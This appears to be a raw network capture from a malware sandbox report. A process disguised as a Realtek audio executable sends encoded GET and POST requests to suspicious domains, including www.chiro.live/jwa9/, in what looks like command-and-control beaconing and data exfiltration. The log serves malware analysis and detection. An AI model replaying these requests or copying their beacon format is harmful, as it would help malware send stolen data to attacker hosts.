                                                                          Data Ascii: 7oyTx9kcuiSNcoAd5+PZNxz043bqt6ffSw4CTNHMbzEYMkAIe+n6IChHcTOyo/diV7wo4jLo1CEc0jtyL1VnZZgz4CewQNWk7BftKEPOdedaGmAk6iQ22Vk4fEzsxzmCyqV/Dh84c/RSPZrFh/xC2bcejqtoDATXPyWAQmejm0/4DISD9PctIC/Fuf3krdmo/4mKV7XTxXyH36NOmC5fMTh4xxKR9gH6Ytq0JBI4A1hwWA9XrRE
                                                                          Jan 9, 2025 16:50:44.772950888 CET1064INHTTP/1.1 404 Not Found
                                                                          Date: Thu, 09 Jan 2025 15:50:44 GMT
                                                                          Content-Type: text/html; charset=iso-8859-1
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close
                                                                          cf-cache-status: DYNAMIC
                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TOoijhS9hbpWsqe90%2B6jaKysCqjmz%2BitwTks8LZlLEQ1CvB5ivpkjRt1a5wnblPHuE9j6InGQnBnCr8lzn06CAlR95WAOJRuKK7y%2BzCOeoReFWI2vjN3JzkMhi6D%2FBlkwOqbyCz0Tg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                          Server: cloudflare
                                                                          CF-RAY: 8ff595b0392e10b4-ORD
                                                                          Content-Encoding: gzip
                                                                          alt-svc: h3=":443"; ma=86400
                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=119085&min_rtt=119085&rtt_var=59542&sent=6&recv=9&lost=0&retrans=0&sent_bytes=0&recv_bytes=7976&delivery_rate=0&cwnd=248&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                          Data Raw: 65 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8f c1 6e c2 30 10 44 ef fe 8a 2d 77 b2 01 71 e8 61 65 a9 25 41 45 0a 34 6a cd 81 a3 c1 5b 19 89 c6 c6 de 34 e2 ef ab 04 55 ea 75 e6 cd 68 86 9e aa f7 b5 39 b6 35 bc 99 5d 03 ed e1 b5 d9 ae 61 36 47 dc d6 66 83 58 99 ea e1 2c 8b 12 b1 de cf b4 22 2f df 57 4d 9e ad d3 8a e4 22 57 d6 ab 72 05 fb 20 b0 09 7d e7 08 1f a2 22 9c 20 3a 05 77 1f 73 0b fd 8f f1 0b ad 28 6a e3 19 12 df 7a ce c2 0e 0e 1f 0d 0c 36 43 17 04 be 46 0e 42 07 e2 2f 19 32 a7 1f 4e 05 61 1c 9b 92 56 64 9d 4b 9c b3 7e 89 f6 ec 19 3e 27 00 ac c0 30 0c c5 a9 bf e7 c8 7c f6 59 8a ec 43 84 36 24 81 e7 92 f0 2f a6 08 a7 5d 84 d3 9f 5f 00 00 00 ff ff e3 02 00 2b bb 83 fa 0a 01 00 00 0d 0a
                                                                          Data Ascii: e3Ln0D-wqae%AE4j[4Uuh95]a6GfX,"/WM"Wr }" :ws(jz6CFB/2NaVdK~>'0|YC6$/]_+
                                                                          Jan 9, 2025 16:50:44.773082972 CET5INData Raw: 30 0d 0a 0d 0a
                                                                          Data Ascii: 0


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          48192.168.11.2049793104.21.112.1807540C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Jan 9, 2025 16:50:47.104903936 CET534OUTGET /w98i/?lV=UfwHaNGeM7ohZqxMT1oJCRJMGlT3jOeFYxLhiKeMkeFhJQngpiBu1nR/iO/Vw2KMOuQK2IyXNyNkQANnRhWnyAeSvZ4PYAj0T7gn5XvtXdm/7Udw9aOHtOE=&LSbaT=zft4LoBw HTTP/1.1
                                                                          Host: www.buyspeechst.shop
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                          Accept-Language: en-US,en
                                                                          Connection: close
                                                                          User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                          Jan 9, 2025 16:50:47.744864941 CET814INHTTP/1.1 404 Not Found
                                                                          Date: Thu, 09 Jan 2025 15:50:47 GMT
                                                                          Content-Type: text/html; charset=iso-8859-1
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close
                                                                          cf-cache-status: DYNAMIC
                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6AVP%2F7HpE%2FW7Waeocc%2BFhfvYe%2BtIc8MzgSKH2Pf%2BWoBEWMtfqofeYBHRfDLljOxa%2B%2Bb5%2B5vLyB0sQqYkAF7jEEdSdYdTsvYORwEY0REsPeDDM1YKk7IZULT4PZ6AosEzQ3DCb3B8Zw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                          Server: cloudflare
                                                                          CF-RAY: 8ff595c0df92f865-ORD
                                                                          alt-svc: h3=":443"; ma=86400
                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=118684&min_rtt=118684&rtt_var=59342&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=534&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                          Jan 9, 2025 16:50:47.744882107 CET273INData Raw: 31 30 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f
                                                                          Data Ascii: 10a<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at www.buyspeechst.shop Port
                                                                          Jan 9, 2025 16:50:47.745018005 CET5INData Raw: 30 0d 0a 0d 0a
                                                                          Data Ascii: 0


                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                          49192.168.11.2049794194.9.94.8580
                                                                          TimestampBytes transferredDirectionData
                                                                          Jan 9, 2025 16:51:04.243014097 CET528OUTGET /js1x/?LSbaT=zft4LoBw&lV=YzadGC6YqOgjY/9qwmEESxfA+8MKCZxp0CcLO+Xh8dJmB8CdhvgUA7hRZF2xLQJtMCWb5Kgxi+xGIwqq0R102ShiT2rp0EsU7QKswMKkfsup8/2EYKLr6Ec= HTTP/1.1
                                                                          Host: www.milp.store
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                          Accept-Language: en-US,en
                                                                          Connection: close
                                                                          User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                          Jan 9, 2025 16:51:04.492722034 CET1289INHTTP/1.1 200 OK
                                                                          Server: nginx
                                                                          Date: Thu, 09 Jan 2025 15:51:04 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close
                                                                          X-Powered-By: PHP/8.1.30
                                                                          Data Raw: 31 35 66 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 3c 21 2d 2d 20 47 6f 6f 67 6c 65 20 54 61 67 20 4d 61 6e 61 67 65 72 20 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 77 2c 64 2c 73 2c 6c 2c 69 29 7b 77 5b 6c 5d 3d 77 5b 6c 5d 7c 7c 5b 5d 3b 77 5b 6c 5d 2e 70 75 73 68 28 7b 27 67 74 6d 2e 73 74 61 72 74 27 3a 0a 6e 65 77 20 44 61 74 65 28 29 2e 67 65 74 54 69 6d 65 28 29 2c 65 76 65 6e 74 3a 27 67 74 6d 2e 6a 73 27 7d 29 3b 76 61 72 20 66 3d 64 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 73 29 5b 30 5d 2c 0a 6a [TRUNCATED]
                                                                          Data Ascii: 15f9<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head>... Google Tag Manager --><script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src='https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);})(window,document,'script','dataLayer','GTM-NP3MFSK');</script>... End Google Tag Manager --> <meta http-equiv="X-UA-Compatible" content="IE=EDGE" /><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><meta name="loopia-test" content="XsdXAIxha8q9Xjamck4H" /><title>Parked at Loopia</title> <link rel="apple-touch-icon" media="screen and (resolution: 163dpi)" href="https://static.loopia.se/responsive/images/iOS-57.png" /> <link rel="apple-touch-icon" media="screen and (resolution [TRUNCATED]
                                                                          Jan 9, 2025 16:51:04.492779016 CET1289INData Raw: 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 20 61 6e 64 20 28 72 65 73 6f 6c 75 74 69 6f 6e 3a 20 33 32 36 64 70 69 29 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 2e 6c 6f 6f 70 69 61
                                                                          Data Ascii: le-touch-icon" media="screen and (resolution: 326dpi)" href="https://static.loopia.se/responsive/images/iOS-114.png" /> <meta name="viewport" content="initial-scale=1.0, maximum-scale = 1.0, width=device-width" /> <link rel="stylesheet
                                                                          Jan 9, 2025 16:51:04.492858887 CET1289INData Raw: 20 74 6f 20 76 69 65 77 20 74 68 65 20 64 6f 6d 61 69 6e 20 68 6f 6c 64 65 72 27 73 20 70 75 62 6c 69 63 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 2e 3c 2f 70 3e 0a 09 09 09 3c 70 3e 41 72 65 20 79 6f 75 20 74 68 65 20 6f 77 6e 65 72 20 6f 66 20 74 68
                                                                          Data Ascii: to view the domain holder's public information.</p><p>Are you the owner of the domain and want to get started? Login to <a href="https://www.loopia.com/login?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&utm_con
                                                                          Jan 9, 2025 16:51:04.492899895 CET1289INData Raw: 6c 20 63 6f 6e 74 72 6f 6c 20 6f 66 20 79 6f 75 72 20 64 6f 6d 61 69 6e 73 20 77 69 74 68 20 4c 6f 6f 70 69 61 44 4e 53 3c 2f 68 33 3e 0a 09 09 09 3c 70 3e 57 69 74 68 20 4c 6f 6f 70 69 61 44 4e 53 2c 20 79 6f 75 20 77 69 6c 6c 20 62 65 20 61 62
                                                                          Data Ascii: l control of your domains with LoopiaDNS</h3><p>With LoopiaDNS, you will be able to manage your domains in one single place in Loopia Customer zone. <a href="https://www.loopia.com/loopiadns/?utm_medium=sitelink&utm_source=loopia_parkingwe
                                                                          Jan 9, 2025 16:51:04.493123055 CET661INData Raw: 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 70 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 6f 6e 74 65 6e 74 3d 68 6f 73 74 69 6e 67 22 20 63 6c 61 73 73 3d 22 62 74 6e 20 62 74 6e 2d 70 72 69 6d 61 72 79 22 3e 4f 75 72
                                                                          Data Ascii: arkingweb&utm_campaign=parkingweb&utm_content=hosting" class="btn btn-primary">Our web hosting packages</a></div>... /END .main --><div id="footer" class="center"><span id="footer_se" class='lang_se'><a href="https://www.loop
                                                                          Jan 9, 2025 16:51:04.493166924 CET5INData Raw: 30 0d 0a 0d 0a
                                                                          Data Ascii: 0


                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                          50192.168.11.2049795198.58.118.16780
                                                                          TimestampBytes transferredDirectionData
                                                                          Jan 9, 2025 16:51:09.654333115 CET789OUTPOST /jwa9/ HTTP/1.1
                                                                          Host: www.chiro.live
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en
                                                                          Connection: close
                                                                          Cache-Control: no-cache
                                                                          Content-Length: 199
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Origin: http://www.chiro.live
                                                                          Referer: http://www.chiro.live/jwa9/
                                                                          User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                          Data Raw: 6c 56 3d 71 5a 73 37 35 31 75 39 68 4a 6a 45 62 31 62 57 4b 43 2f 49 59 6a 66 30 74 63 71 2f 61 71 46 51 5a 65 72 4a 55 45 2b 4d 72 70 30 61 7a 51 6d 75 45 61 6f 4c 2b 76 66 52 72 7a 69 56 36 5a 79 71 4b 70 58 61 2f 35 59 43 4f 6a 57 69 45 49 41 58 48 65 74 2b 58 4b 39 6d 49 63 6d 79 42 62 54 50 4f 52 34 78 58 52 2f 4f 66 30 38 4e 39 65 72 65 45 43 46 4a 79 61 6f 4d 51 48 78 52 6d 42 31 34 35 49 4d 6f 6e 4e 74 73 2b 6a 56 54 79 69 4f 61 43 63 45 4b 68 49 36 77 7a 64 34 78 57 49 34 33 32 56 4b 6e 4d 4d 30 6c 58 56 53 4a 6f 4a 51 5a 33 37 4c 6f 44 49 59 30 2f 43 6e 6b 43 57 72 52 43 67 3d 3d
                                                                          Data Ascii: lV=qZs751u9hJjEb1bWKC/IYjf0tcq/aqFQZerJUE+Mrp0azQmuEaoL+vfRrziV6ZyqKpXa/5YCOjWiEIAXHet+XK9mIcmyBbTPOR4xXR/Of08N9ereECFJyaoMQHxRmB145IMonNts+jVTyiOaCcEKhI6wzd4xWI432VKnMM0lXVSJoJQZ37LoDIY0/CnkCWrRCg==
                                                                          Jan 9, 2025 16:51:09.800008059 CET806INHTTP/1.1 200 OK
                                                                          server: openresty/1.13.6.1
                                                                          date: Thu, 09 Jan 2025 15:51:09 GMT
                                                                          content-type: text/html
                                                                          transfer-encoding: chunked
                                                                          content-encoding: gzip
                                                                          connection: close
                                                                          Data Raw: 32 36 36 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 53 4d 73 9b 30 10 bd e7 57 50 0e 99 76 a6 06 83 1d db 34 90 4e 42 fd 59 c7 4e 1c 27 18 5f 32 42 52 2c 11 21 51 10 60 a7 d3 ff 5e 6c 3a 31 1d f7 50 1d 90 76 d9 7d bb ef ad 64 7f f8 36 77 97 fe 5d 5f 21 32 62 57 67 f6 7e 53 18 e0 1b 47 c5 5c bd 3a 53 ca 65 13 0c 50 75 3c 98 11 96 40 81 04 24 29 96 8e fa b8 1c 34 7a 7f 22 8f bf 89 94 71 03 ff c8 68 ee a8 db 46 06 1a 50 44 31 90 34 60 58 55 a0 e0 12 f3 32 77 dc 77 30 da e0 93 6c 0e 22 ec a8 39 c5 45 2c 12 59 4b 28 28 92 c4 41 38 a7 10 37 0e c6 67 85 72 2a 29 60 8d 14 02 86 1d 43 6b d6 e1 24 95 0c 5f d9 7a b5 1f e8 1c 9a e4 22 85 09 8d e5 91 d6 bf 7b 4f f0 4b 82 53 52 6b a1 79 99 25 cc d9 f3 fb a2 eb 45 51 74 9b 1a 24 34 11 1a a3 39 d6 55 45 3f 42 da fa 69 19 fb a0 5e 5d 9e d3 12 17 ff 57 c2 d6 8f 83 b1 03 81 76 8a e0 4c 00 e4 a8 48 3c 57 c7 8f 9f ea 62 54 94 15 b9 8b 4b 75 25 de 4a 3d 04 39 a8 bc b5 b8 bd 12 2f 19 87 92 0a ae d4 a0 94 9f ef fa ed 43 f6 ab a0 1c 89 42 93 22 d6 98 80 e5 7c 05 d7 48 49 48 71 [TRUNCATED]
                                                                          Data Ascii: 266SMs0WPv4NBYN'_2BR,!Q`^l:1Pv}d6w]_!2bWg~SG\:SePu<@$)4z"qhFPD14`XU2ww0l"9E,YK((A87gr*)`Ck$_z"{OKSRky%EQt$49UE?Bi^]WvLH<WbTKu%J=9/CB"|HIHq(Q]MaZ~":VfNjIpM+k:5|Sqg6j &rBi4`56Fc8"^9fs0Z8I7#hZ/W,W809nt!65& k1G6_?X/PnPzEB0d%N}rf^5_oJH.\0


                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                          51192.168.11.2049796198.58.118.16780
                                                                          TimestampBytes transferredDirectionData
                                                                          Jan 9, 2025 16:51:12.329804897 CET809OUTPOST /jwa9/ HTTP/1.1
                                                                          Host: www.chiro.live
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en
                                                                          Connection: close
                                                                          Cache-Control: no-cache
                                                                          Content-Length: 219
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Origin: http://www.chiro.live
                                                                          Referer: http://www.chiro.live/jwa9/
                                                                          User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                          Data Raw: 6c 56 3d 71 5a 73 37 35 31 75 39 68 4a 6a 45 5a 58 50 57 4d 6c 6a 49 51 6a 66 33 6f 63 71 2f 44 36 46 63 5a 65 58 4a 55 41 4f 6d 73 66 6b 61 79 78 57 75 46 65 38 4c 35 76 66 52 6a 54 69 51 6e 4a 79 74 4b 70 4c 38 2f 34 30 43 4f 6e 32 69 45 4e 73 58 62 39 56 39 46 71 39 67 42 38 6d 30 46 62 54 50 4f 52 34 78 58 52 72 6f 66 30 6b 4e 38 75 62 65 47 6a 46 4b 2b 36 6f 54 48 33 78 52 77 78 31 38 35 49 4d 4b 6e 50 4a 4b 2b 67 74 54 79 6a 2b 61 43 4e 45 4a 36 59 36 79 75 4e 35 65 64 59 68 68 34 46 6d 77 4c 65 55 65 50 32 72 39 6b 2f 64 44 71 4a 2f 4d 41 62 45 47 37 79 65 4d 41 55 71 4b 66 72 59 73 44 71 70 43 36 4f 7a 4f 78 54 6f 31 7a 42 7a 78 53 6b 49 3d
                                                                          Data Ascii: lV=qZs751u9hJjEZXPWMljIQjf3ocq/D6FcZeXJUAOmsfkayxWuFe8L5vfRjTiQnJytKpL8/40COn2iENsXb9V9Fq9gB8m0FbTPOR4xXRrof0kN8ubeGjFK+6oTH3xRwx185IMKnPJK+gtTyj+aCNEJ6Y6yuN5edYhh4FmwLeUeP2r9k/dDqJ/MAbEG7yeMAUqKfrYsDqpC6OzOxTo1zBzxSkI=
                                                                          Jan 9, 2025 16:51:12.475404024 CET805INHTTP/1.1 200 OK
                                                                          server: openresty/1.13.6.1
                                                                          date: Thu, 09 Jan 2025 15:51:12 GMT
                                                                          content-type: text/html
                                                                          transfer-encoding: chunked
                                                                          content-encoding: gzip
                                                                          connection: close
                                                                          Data Raw: 32 36 35 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 53 4d 73 9b 30 10 bd e7 57 50 0e 99 76 a6 36 06 db b1 dd 40 3a 09 f5 67 1d 3b 71 9c 00 be 64 84 a4 58 22 42 a2 20 c0 4e a7 ff bd 60 3a 31 1d f7 50 1d 90 76 d9 7d bb ef ad 64 7e f8 b6 b4 d7 de dd 50 21 32 64 57 67 66 b9 29 0c f0 ad a5 62 ae 5e 9d 29 c5 32 09 06 a8 3a 1e cc 10 4b a0 40 02 e2 04 4b 4b 7d 5c 8f 1a fd 3f 91 c7 df 44 ca a8 81 7f a4 34 b3 d4 5d 23 05 0d 28 c2 08 48 ea 33 ac 2a 50 70 89 79 91 3b 1d 5a 18 6d f1 49 36 07 21 b6 d4 8c e2 3c 12 b1 ac 25 e4 14 49 62 21 9c 51 88 1b 07 e3 b3 42 39 95 14 b0 46 02 01 c3 96 de 6c d5 e1 24 95 0c 5f 99 5a b5 1f e8 1c 9a e4 22 81 31 8d e4 91 d6 bf 7b 8f f1 4b 8c 13 52 6b a1 75 99 c6 cc 2a f9 7d d1 b4 3c cf 7b ad 26 24 34 16 4d 46 33 ac a9 8a 76 84 34 b5 d3 32 e6 41 bd ba 3c a7 25 ba ff 57 c2 d4 8e 83 31 7d 81 f6 8a e0 4c 00 64 a9 48 3c 57 c7 8f 9f ea 62 54 94 15 b9 8f 0a 75 25 de 49 2d 00 19 a8 bc b5 b8 52 89 97 94 43 49 05 57 6a 50 ca cf 77 fd ca 90 72 e5 94 23 91 37 a5 88 9a 4c c0 62 be 82 37 49 41 48 b1 [TRUNCATED]
                                                                          Data Ascii: 265SMs0WPv6@:g;qdX"B N`:1Pv}d~P!2dWgf)b^)2:K@KK}\?D4]#(H3*Ppy;ZmI6!<%Ib!QB9Fl$_Z"1{KRku*}<{&$4MF3v42A<%W1}LdH<WbTu%I-RCIWjPwr#7Lb7IAH(Q] )Ek_t~hZmC^wp.$33tIk3==0|7AZfMV3Fyep1CqiMLVwNn,N1<wF'c=Y[W`dc<fxE3.":]|J7$QZP*g2U7/];;0


                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                          52192.168.11.2049797198.58.118.16780
                                                                          TimestampBytes transferredDirectionData
                                                                          Jan 9, 2025 16:51:15.001622915 CET2578OUTPOST /jwa9/ HTTP/1.1
                                                                          Host: www.chiro.live
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en
                                                                          Connection: close
                                                                          Cache-Control: no-cache
                                                                          Content-Length: 7367
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Origin: http://www.chiro.live
                                                                          Referer: http://www.chiro.live/jwa9/
                                                                          User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                          Data Raw: 6c 56 3d 71 5a 73 37 35 31 75 39 68 4a 6a 45 5a 58 50 57 4d 6c 6a 49 51 6a 66 33 6f 63 71 2f 44 36 46 63 5a 65 58 4a 55 41 4f 6d 73 66 73 61 79 44 4f 75 45 35 41 4c 34 76 66 52 70 7a 69 52 6e 4a 7a 6f 4b 70 44 77 2f 34 70 31 4f 6c 4f 69 46 76 6b 58 58 63 56 39 4f 71 39 67 4d 63 6d 78 42 62 54 67 4f 52 6f 4c 58 52 37 6f 66 30 6b 4e 38 74 54 65 42 79 46 4b 38 36 6f 4d 51 48 78 56 6d 42 30 6a 35 49 56 6f 6e 50 64 38 39 52 4e 54 78 44 75 61 4f 66 73 4a 6e 49 36 30 74 4e 35 47 64 59 63 2f 34 46 36 57 4c 64 49 34 50 31 37 39 6b 34 77 4d 35 37 58 6b 52 74 45 64 36 7a 75 32 49 32 75 67 58 4d 4d 4c 4d 5a 70 71 36 4f 79 63 2b 54 77 4f 6b 77 2f 30 47 6a 63 46 42 43 44 37 51 64 43 61 4e 65 54 61 39 41 5a 42 46 71 71 33 35 71 59 4d 4d 31 53 4d 54 6c 52 57 68 58 7a 4c 41 5a 6c 46 4b 49 48 49 4c 4c 49 73 61 31 70 66 59 4a 2b 56 76 4b 77 55 53 33 62 56 58 31 61 53 6c 71 43 7a 78 48 75 73 6b 58 51 52 67 49 63 78 55 57 4a 47 66 72 4e 76 43 71 50 78 62 53 64 56 48 36 45 4d 7a 74 4a 4d 54 58 69 6f 63 55 32 30 46 47 6d [TRUNCATED]
                                                                          Data Ascii: lV=qZs751u9hJjEZXPWMljIQjf3ocq/D6FcZeXJUAOmsfsayDOuE5AL4vfRpziRnJzoKpDw/4p1OlOiFvkXXcV9Oq9gMcmxBbTgORoLXR7of0kN8tTeByFK86oMQHxVmB0j5IVonPd89RNTxDuaOfsJnI60tN5GdYc/4F6WLdI4P179k4wM57XkRtEd6zu2I2ugXMMLMZpq6Oyc+TwOkw/0GjcFBCD7QdCaNeTa9AZBFqq35qYMM1SMTlRWhXzLAZlFKIHILLIsa1pfYJ+VvKwUS3bVX1aSlqCzxHuskXQRgIcxUWJGfrNvCqPxbSdVH6EMztJMTXiocU20FGmUz3CWIAU+zmxLXYWK2/ftE0etZ3pNfyL/+cpWwy/VcQDV7Gq5GxCACrfZE7opOuKVfxHEzlzXSUkt19ht+DE0yksgKNQ2jthDH/A32PPzB5myuFgwMd6jCDUtCcTfi0vPJ1rRJg0A86S1KO6SJ209X85C2XpL8Ms57F6bCOdSUNNlYEa5Ngk6yq5gHRl9b/rHfxMDt+N6jXi2EhDR1EQ22P0l63H0Unr/CVTCWStQZGwiaVmxLZyCys/PCKDchCvrRfN8xMPcul2AKPxLotGE53zhoeOpTcdUXLTGiDnjrJRlxtI1cSHWSRCYnRY12ix73om2423CDf+1l0ECju4o3MUw4Zvnqp1zP7dABrBcS7mUTBcGI1fbWs2kItZs0LHxeix/nHdwozmGa/ZPJ9o/qTDYENdqIEvUfbd8O92t9OBtpcBT2RjjhvjReT175Sdrr5tNucg+saYM9wd63Q16rJXd3LK4MOBYsBxQEibHEfeLqzVgOiidz2IscMTJ44PFv+UcUK5O3hUNMr1OEg6V7G/L3zUZFKa3yBeM3Qqh6qjTOiTRNNPP8PbNsf49WSm7lKcRXBVdfsDZVV+OATcjz+LmbZVyqn9JkhY8WJDa/0nqDkzZx91ISfUftWJj817AFZjf0akeehHVq7uEIWUlfR7tb/NxvCSJU [TRUNCATED]
                                                                          Jan 9, 2025 16:51:15.001667976 CET5380OUTData Raw: 66 67 43 74 73 70 4a 53 45 49 70 52 70 72 2f 48 69 52 6b 78 6d 79 35 75 6a 46 79 53 6a 2f 5a 4b 52 56 74 56 6d 2f 63 75 63 37 48 54 61 31 36 4c 47 66 72 37 31 76 75 4f 4e 53 74 61 53 37 4f 6a 63 38 34 51 4b 59 46 4e 67 61 55 76 33 62 38 64 42 32
                                                                          Data Ascii: fgCtspJSEIpRpr/HiRkxmy5ujFySj/ZKRVtVm/cuc7HTa16LGfr71vuONStaS7Ojc84QKYFNgaUv3b8dB2EhEL+CTRNFTCfcYxjECc94VTPbTUj7ac17b0ROdOMxZ5cSbT2ovBOxwGQk+jNW2uyMV+g/0oVhrR0kG5jzAglKXq1fJt3a7UoAYGKG2GkrnhshBjigkRag29BQOf+p9VJuLYtqcL0/hPkmw8RDo87C9nlBTbP/+PH
                                                                          Jan 9, 2025 16:51:15.147986889 CET806INHTTP/1.1 200 OK
                                                                          server: openresty/1.13.6.1
                                                                          date: Thu, 09 Jan 2025 15:51:15 GMT
                                                                          content-type: text/html
                                                                          transfer-encoding: chunked
                                                                          content-encoding: gzip
                                                                          connection: close
                                                                          Data Raw: 32 36 36 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 53 4d 73 9b 30 10 bd e7 57 50 0e 99 76 a6 36 1f b6 83 dd 40 3a 09 f5 67 1d 3b 71 9c 60 7c c9 08 49 b1 44 84 44 41 80 9d 4e ff 7b b1 e9 c4 74 dc 43 75 40 da 65 f7 ed be b7 92 fd e1 db dc 5d fa 77 7d 85 c8 88 5d 9d d9 fb 4d 61 80 6f 1c 15 73 f5 ea 4c 29 97 4d 30 40 d5 f1 60 46 58 02 05 12 90 a4 58 3a ea e3 72 d0 e8 fe 89 3c fe 26 52 c6 0d fc 23 a3 b9 a3 6e 1b 19 68 40 11 c5 40 d2 80 61 55 81 82 4b cc cb dc 71 df c1 68 83 4f b2 39 88 b0 a3 e6 14 17 b1 48 64 2d a1 a0 48 12 07 e1 9c 42 dc 38 18 9f 15 ca a9 a4 80 35 52 08 18 76 8c a6 5e 87 93 54 32 7c 65 6b d5 7e a0 73 68 92 8b 14 26 34 96 47 5a ff ee 3d c1 2f 09 4e 49 ad 05 fd 32 4b 98 b3 e7 f7 45 d3 8a a2 b0 f4 26 24 34 11 4d 46 73 ac a9 8a 76 84 b4 b5 d3 32 f6 41 bd ba 3c a7 25 3a ff 57 c2 d6 8e 83 b1 03 81 76 8a e0 4c 00 e4 a8 48 3c 57 c7 8f 9f ea 62 54 94 15 b9 8b 4b 75 25 de 4a 2d 04 39 a8 bc b5 b8 bd 12 2f 19 87 92 0a ae d4 a0 94 9f ef fa ed 43 f6 ab a0 1c 89 a2 29 45 